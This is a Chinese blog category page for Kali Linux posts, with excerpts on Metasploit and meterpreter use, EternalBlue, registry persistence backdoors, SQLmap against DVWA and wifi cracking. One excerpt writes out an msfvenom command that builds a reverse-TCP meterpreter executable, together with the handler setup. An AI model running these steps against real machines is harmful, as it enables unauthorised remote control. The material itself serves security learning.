kali
文章平均质量分 71
生命的脚步从不停歇
1
展开
-
端口映射公网IP访问内网服务器
简单记录配置网关、路由器,进行端口映射;在外网通过公网IP访问kali虚拟机的apache站点。假设当前有以下设备、配置:手机数据访问页面http://110.110.110.110:8000,成功打开页面。原创 2022-06-19 00:12:27 · 5571 阅读 · 0 评论 -
xss 验证
test原创 2019-12-01 00:00:38 · 622 阅读 · 0 评论 -
后渗透之meterpreter使用攻略
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。0x01.系统命令1)基本系统命令sessions #sessions –h 查看帮助sessions -i <ID值> #进入会话 -k 杀死会话...转载 2019-05-13 09:40:39 · 2053 阅读 · 0 评论 -
利用msfvenom与metasploit入侵windows
利用msfvenom生成木马配置metasploit监听端口上线目标主机:windows7启动kali输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP 端口 -f exe -o /root/name.exe然后msf配置过程你们懂的msf > use exploit/multi/handlerMs...转载 2019-05-10 20:59:18 · 874 阅读 · 0 评论 -
演示使用Metasploit入侵Windows
我使用KaliLinux的IP地址是192.168.0.112;在同一局域网内有一台运行WindowsXP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows...转载 2019-05-09 17:38:10 · 2685 阅读 · 0 评论 -
常见的几种Windows后门持久化方式
0×0 背景持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。0×1 注册表自启动最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...转载 2019-05-09 14:26:57 · 2089 阅读 · 0 评论 -
使用永恒之蓝(MS17-010)漏洞入侵windows7
永恒之蓝简介前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了一半的原因在于自己真的没有意识,都2017年了,还把文件放在本...转载 2019-05-09 14:18:24 · 1865 阅读 · 0 评论 -
作为内网杀手的metasploit如何在外网使用呢?
经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!什么是内网?内网接入方...转载 2019-05-09 14:02:27 · 5213 阅读 · 17 评论 -
lkali 下Apache2 的 CGI 简单配置
Ubuntu下Apache2的CGI简单配置配置Apache21.安装Apache2sudo apt-get install apache22.检查安装是否成功systemctl status apache2.service如果安装成功的话会出现如下内容: apache2.service - LSB: Apache2 web server Loaded: l...转载 2019-03-11 13:34:44 · 1190 阅读 · 0 评论 -
DVWA+SQLmap+Mysql注入实战
实战 实战1:枚举登录MYSQL数据的用户名与密码 实战2:枚举所有数据库 实战3:枚举指定数据库的数据表 实战4:获取指定数据库和表中所有列的信息 实战5:枚举指定数据表中的所有用户名与密码 环境准备: 1)登录http://192.168.1.124/DVWA-1.9...转载 2019-02-22 13:45:38 · 463 阅读 · 0 评论 -
kali(2018) metasploit postgresql 远程客户端连接数据库
目的:在postgresql 数据库客户端里看看metasploit 的数据结构。步骤: 下载安装navicat premium并pojie ,请自行百度; kali下查询ip地址:ifconfig ; kali下查看端口号、用户名:/usr/share/metasploit-framework/config/database.yml ;如果不存在就:使用(find / -n...原创 2019-01-14 14:48:16 · 1031 阅读 · 2 评论 -
test
原创 2018-05-16 11:35:24 · 143 阅读 · 0 评论 -
虚拟机中的Linux安装VMware Tools的方法
原文地址:http://www.jb51.net/softjc/189144.html我宿主机是mac,使用vmware fusion,虚拟机装的kali。依据本文,稍作变通,成功安装vware tools.Linux VMware Tools安装步骤简易版Linux VMware Tools安装估计有点困难,我也在网上看了好多版本的Linux安装VMware Tools,方法都一样。但是自己在安...转载 2018-05-13 21:33:02 · 4089 阅读 · 0 评论 -
【转载】kali wifi 无线渗透
原文:https://blog.csdn.net/ski_12/article/details/76598873前期准备:在虚拟机Kali中是无法直接使用物理机本身的网卡的,需要自己买一块网卡插上去让Kali使用,而且对于网卡的类型也是有限制的,买得不好的话就用不了又得退货。本人在这用的无线网卡型号为EP-N8508GS,仅供参考。Fighting:先将无线网卡插入Kali Linux,输入iwc...转载 2018-05-13 15:21:58 · 970 阅读 · 0 评论